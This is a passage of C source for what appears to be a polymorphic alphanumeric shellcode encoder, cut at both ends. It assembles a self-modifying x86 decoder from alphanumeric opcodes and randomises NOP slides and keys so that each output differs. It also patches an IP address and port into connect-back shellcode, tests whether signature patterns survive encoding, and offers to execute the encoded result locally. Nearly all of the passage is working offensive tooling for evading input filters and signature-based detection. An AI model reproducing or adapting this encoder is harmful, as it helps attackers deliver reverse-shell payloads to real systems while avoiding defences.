(this can change) // [edi = address of decoder]------+ | | | /*14*/ '\x61', //popad // [set all registers] <-----------' | | | /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | /*26*/ '\x52', //push edx [save decoder address on stack] | | | /*27*/ '\x52', //push edx >----. | | | /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. 
| | | | | | | | /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | /*67*/ '\x49',// //dec ecx| |// | | | | | | /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | /*70*/ '\x41',// //inc edx| |// | | | | | | /*71*/ '\x49',// //dec edx| |// | | | | | | /*72*/ '\x41',// //inc esi| |// | | | | | | /*73*/ '\x49',// //dec 
esi+-----------------------+// | | | | | | /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | // | | | | | | // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | // or the offset will not be alphanumeric. | | | | | | // | | | | | | // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | // register instead. We happen to have such a register - edi =] | | | | | | // | | | | | | // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | // the pop eax would overwrite it | | | | | | // | | | | | | // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | // alphanumeric.). | | | | | | // | | | | | | // -OBSOLETE- | | | | | | // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (add the number of bytes to it) | | | | | | // If you wish to move it down, you will need to move it down by an even number of | | | | | | // bytes. 
| | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (deduct the number of bytes from it) | | | | | | // | | | | | | // TODO: make a routine that moves it around randomally between allowed values | | | | | | // and sets the proper offsets | | | | | | // this routine should be called after the NOP slides have been randomized. | | | | | | // | | | | | | ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | /*83*/ '\x49',// //dec esi| |// | | | | | | /*84*/ '\x41',// //push eax| |// | | | | | | /*85*/ '\x49',// //pop eax| |// | | | | | | /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | // IMUL can go down to here | | | | | | ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. 
| | | | /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | /*104*/ '\x45', //ebp incremented once //inc ebp | | | | /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | };////////////////////////////////////////////////// | | UINT shrink; // | | UCHAR *found_msg; // | | UCHAR *p_decoder = decoder; // | | UCHAR xor1, xor2, key; // | | UCHAR temp_buf[3] = ""; // | | UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). 
| | UCHAR *p_shellcode = shellcode; // | | void *_eip = 0; // | | // | | int offset_nop_slide1; // | | int offset_nop_slide2; // | | int offset_half_size_decoder; // | | int offset_terminating_key; // | | int offset_imul_instruction1; // | | int offset_imul_instruction2; // | | int offset_imul_instruction3; // | | int offset_imul_instruction4; // | | int negative_offset_size_decoder1; // | | int negative_offset_size_decoder2; // | | int negative_offset_size_decoder3; // | | int offset_size_decoder_min_1; // | | int offset_size_decoder_pls_2; // | | int offset_imul_key_offset1; // | | int offset_imul_key_offset2; // | | int offset_imul_key_offset3; // | | int offset_imul_instruction; // | | int size_nop_slide1; // | | int size_nop_slide2; // | | int offset_jne_xor1; // | | int offset_jne_xor2; // | | int decoder_length_section1; // | | int decoder_length_section2; // | | int decoder_length_section3; // | | int imul_instruction_length; // | | int jne_xor_negative_offset; // | | int backward_slide_offset; // | | BOOL decoder_version_1; // | | UINT srand_value; // | | #ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | #endif ////////////////// | | printf("shellcode length:%d\n", size); // | | srand_value = time(NULL); // | | // srand_value = ; // for debugging | | srand(srand_value); // | | printf("srand value=%d\n", srand_value); // | | decoder_version_1 = rand() % 2; // | | ///// | | size_decoder = strlen(decoder);// | | decoder_length_section1 = 30; ////////////// | | decoder_length_section2 = 29; // | | decoder_length_section3 = 18; // | | // | | size_nop_slide1 
= 28; // | | size_nop_slide2 = 0; // | | // | | imul_instruction_length = 4; // | | // | | shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | size_decoder -=shrink; /////////////////////////////////////////////////////// | | half_size_decoder = size_decoder/2; // | | size_nop_slide1 -=shrink; ///////////////////////// | | printf("shrinking decoder by: %d\n", shrink); // | | // | | offset_imul_instruction = decoder_length_section1+// | | decoder_length_section2+// | | size_nop_slide1;////////// | | // | | backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | strncpy(decoder, // | | slide_substr_back(decoder, // | | offset_imul_instruction, // | | imul_instruction_length, // | | size_decoder, ///// | | backward_slide_offset), // | | size_decoder); // | | offset_imul_instruction -=backward_slide_offset; // | | size_nop_slide1 -=backward_slide_offset; // | | size_nop_slide2 +=backward_slide_offset; ////////////// | | printf("backward_slide_offset = %d\n", backward_slide_offset);// | | /////////////////////////////////// | | negative_offset_size_decoder1 = 9; // | | negative_offset_size_decoder2 = 12; // | | negative_offset_size_decoder3 = 15; // | | // | | offset_half_size_decoder = 6; // | | offset_terminating_key = 8; // | | offset_jne_xor1 = 21; // | | offset_size_decoder_min_1 = 24; // | | // | | offset_imul_key_offset1 = 14 + decoder_length_section1; // | | offset_imul_key_offset2 = 17 + decoder_length_section1; // | | offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | offset_imul_key_offset3 = 24 + decoder_length_section1; // | | // | | offset_nop_slide1 = decoder_length_section1+ // | | 
decoder_length_section2; // | | offset_nop_slide2 = decoder_length_section1+ // | | decoder_length_section2+ // | | size_nop_slide1+ // | | imul_instruction_length; // | | // | | offset_imul_instruction1 = offset_imul_instruction; // | | offset_imul_instruction2 = offset_imul_instruction+1; // | | offset_imul_instruction3 = offset_imul_instruction+2; // | | offset_imul_instruction4 = offset_imul_instruction+3; // | | // | | // | | offset_imul_key = offset_imul_instruction4; // | | // | | offset_jne_xor2 = size_decoder-1; // | | jne_xor_negative_offset = decoder_length_section3+ // | | decoder_length_section2+ // | | size_nop_slide2+ // | | imul_instruction_length+ // | | size_nop_slide1; // | | // | | // | | printf("size_decoder=0x%2X - %s\n", // | | (UCHAR)size_decoder, ////// | | is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | // | | printf("half_size_decoder=0x%2X - %s\n", // | | (UCHAR)half_size_decoder, // | | is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_half_size_decoder) = half_size_decoder; // | | // | | printf("offset_imul_key=0x%2X - %s\n", // | | (UCHAR)offset_imul_key, // | | is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | // // | | printf("size_decoder-1=0x%2X - %s\n", // | | (UCHAR)size_decoder-1, // | | is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | // | | printf("size_decoder+2=0x%2X - %s\n", // | | (UCHAR)size_decoder+2, //////// | | is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | 
*(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | // | | *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | // | | *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 0); // | | *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 1); // | | #ifdef CONNECT_BACK_SHELLCODE // | | ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | if (ip_address == -1) /////////////////////////////////////////////////// | | exit(-1); // | | /////////////////////////////////// | | //set shellcode with ip address and port for connect-back // | | ///* ////////// | | *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | #endif ////////////////////////////////////////// | | //*/ // | | //set decoder with 'random' nop slides // | | strncpy(decoder+offset_nop_slide1, //////////////////////////// | | shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | size_nop_slide1); // | | strncpy(decoder+offset_nop_slide2, // | | shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | size_nop_slide2); /////////////////////////////// | | // | | //set decoder with random initial key //////////////////////////////////////////// | | *(decoder+offset_imul_key) = get_random_alnum_value();// | | printf("initial key=0x%2X - %s\n", ////////////// | | (UCHAR)*(decoder+offset_imul_key), // | | is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | // | | 
////////////// | | // | | //set decoder with 'random' dword pushes for registers we won't use //////////////// | | *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | printf("push dword1=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | printf("push dword2=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | printf("push dword3=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | printf("push dword4=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | // | | //bugfix: this time after srand() :) // | | xor_al1=get_random_alnum_value(); // | | xor_al2=get_random_alnum_value(); // | | *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | // | | memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' SIZE_RANDOMIZED_DECODER_HEAD); ////// | //set first xor1 to random alnum value (this is the first byte of the encoded data) // | xor1 = get_random_alnum_value(); // | printf("xor1=0x%2X - %s\n", // | (UCHAR)xor1, // | is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | 
///////////////////////////////////////////////////////// | RE_RUN: // | sprintf(alnum_shellcode, "%s",decoder); // | memset(temp_buf, 0, 3);/////////////////// | for(i=0; i<size; i++) // | { ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte // | // third_byte is the next encoded original byte's first_byte // | // the first byte of the terminating key is the last byte's third_byte /////// | p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]);//get a list of second_byte and third_byte for first_byte// | if(!p_xor2_key) /////// | goto RE_RUN; // | p_xor2_key = choose_random_node(p_xor2_key);//choose a random combination//////////////////////////////////////////// | key=p_xor2_key->key; // | xor2=p_xor2_key->xor2; // | temp_buf[0] = xor1; // | temp_buf[1] = xor2; // | strcat(alnum_shellcode, temp_buf); // append it to our decoder // | xor1=key; // | free_p_xor2_key(p_xor2_key); // free the list // | } //get next original_byte // | //////////////////////// | if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | { // | printf("error - terminating key found in encoded shellcode. 
running again to fix\n");// | goto RE_RUN; // | } ///////////////////////////////////////////////////// | *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | 4); // | // | //bugfix: handle case of esp pointing to shellcode // | if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | { // | // _asm{ // | // push esp; // | // pop eax; // | // xor al, 0x36; // | // xor al, 0x30; // | // } // | p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | p_alnum_shellcode[0] = 'T'; // | p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | p_alnum_shellcode[2] = '4'; // and using other xor values // | p_alnum_shellcode[3] = '6'; // <-- (x+6) // | p_alnum_shellcode[4] = '4'; // // | p_alnum_shellcode[5] = '0'; // <-- x // | p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | size_decoder += 6; // | } // | // | printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | printf("decoder length: %d\n%s\n", // | size_decoder, // | p_alnum_shellcode); // | // | printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | found_msg = 
scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | // | if (str_is_alnum(alnum_shellcode)) // | { // | printf("execute shellcode locally? (hit: y and press enter): ");// | if(tolower(getchar()) == 'y') // | { ///////////// | _asm // | { // | push p_alnum_shellcode; //////// | pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' //jump to head of decoder // jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// } ////////////// } // } // else // { /////////////// printf("error non-alphanumeric shellcode\n"); // } ////////////////////////////// ///////// // return 0; ////// } // /////////////////// BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else 
if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UCHAR key, UINT offset1, UINT offset2) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length) { UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1); UCHAR *temp_buf = malloc(255); strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET)); alnum[strlen(ALNUM_CHARSET)]=0; memset(temp_buf, 0, 255); //this is not for production, just a poc... 
while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1)) { alnum--; strcat(temp_buf, "(buf[0]*'"); temp_buf[strlen(temp_buf)] = *alnum; strcat(temp_buf, "')^buf[1]"); return(temp_buf); } } alnum-=strlen(ALNUM_CHARSET); while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0)) { alnum--; printf("key = 0x%2X ('%c')\n", *alnum, *alnum); return("found pattern using: (buf[1]*key)^buf[0]\n"); } } if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1)) return("(buf[0]*0x30)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0)) return("(buf[1]*0x30)^buf[0]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1)) return("(buf[0]*0x10)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0)) return("(buf[1]*0x10)^buf[0]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]*buf[1])^buf[2]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]*buf[2])^buf[1]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]*buf[2])^buf[0]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]^buf[1])*buf[2]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]^buf[2])*buf[1]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]^buf[2])*buf[0]"); else return ""; } BOOL is_alnum(UCHAR c) { char *alnum = ALNUM_CHARSET; char search_c[2] = ""; search_c[0] = c; return((BOOL)strstr(alnum, search_c)); } BOOL str_is_alnum(UCHAR *str) { ULONG length; length = strlen(str); for(;length>0;length--) { if( 
!is_alnum(str[length-1]) ) return 0; } return 1; } UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) { int xor_complement_1, xor_complement_2; UCHAR two_xor_complements[3]; for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++) { if (is_alnum((UCHAR)xor_complement_1)) { for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++) { if (is_alnum((UCHAR)xor_complement_2)) { if(byte == (xor ^ xor_complement_1 ^ xor_complement_2)) { two_xor_complements[0] = (UCHAR)xor_complement_1; two_xor_complements[1] = (UCHAR)xor_complement_2; } } } } } if(index == 0 || index == 1) return two_xor_complements[index]; else return (UCHAR)0; } BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key) { return (BOOL) strstr(alnum_shellcode, terminating_key); } DWORD ip_str_to_dw(UCHAR *str) { DWORD x[4]; int dwIpAddress; if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN) return -1; sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]); x[3] = x[3] > 255 ? -1 : (x[3] <<= 24); x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); x[0] = x[0] > 255 ? 
-1 : (x[0] <<= 0); dwIpAddress = x[0]+x[1]+x[2]+x[3]; return dwIpAddress; } DWORD my_htonl(DWORD dw_in) { DWORD dw_out; *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); return dw_out; } void free_p_xor2_key(struct xor2_key *node) { struct xor2_key *temp = 0; if(node) { temp = node->prev; while(node->next) { node=node->next; free(node->prev); } free(node); } if(temp) { while(temp->prev) { temp=temp->prev; free(temp->next); } free(temp); } } struct xor2_key *choose_random_node(struct xor2_key *head) { int num_nodes = 1, selected_node, i; struct xor2_key* tail = head; struct xor2_key* pn = NULL ; if (!head || !head->key) return 0; while(tail->next) { tail = tail->next; num_nodes++; } selected_node = rand()%num_nodes; for(i=0; i<selected_node; i++) head = head->next; return head; } struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) { struct xor2_key *p_xor2_key, *p_xor2_key_head; char *alnum = ALNUM_CHARSET; UINT i=0, z=1, r=0, count=0; UCHAR xor2=0, x=0; p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); p_xor2_key->prev = 0; p_xor2_key->next = 0; p_xor2_key->key = 0; p_xor2_key->xor2 = 0; for(i=0; alnum[i]; i++) { for(x=0; alnum[x];x++) { xor2 = alnum[x]; if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) { p_xor2_key->xor2 = xor2; p_xor2_key->key = alnum[i]; p_xor2_key->next = malloc(sizeof(struct xor2_key)); p_xor2_key->next->prev = p_xor2_key; p_xor2_key = p_xor2_key->next; p_xor2_key->key=0; p_xor2_key->xor2=0; } } } if(!p_xor2_key->key) p_xor2_key->next = 0; if (p_xor2_key->prev) p_xor2_key = p_xor2_key->prev; else return 0; free(p_xor2_key->next); p_xor2_key->next=0; return p_xor2_key_head; } UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null. 
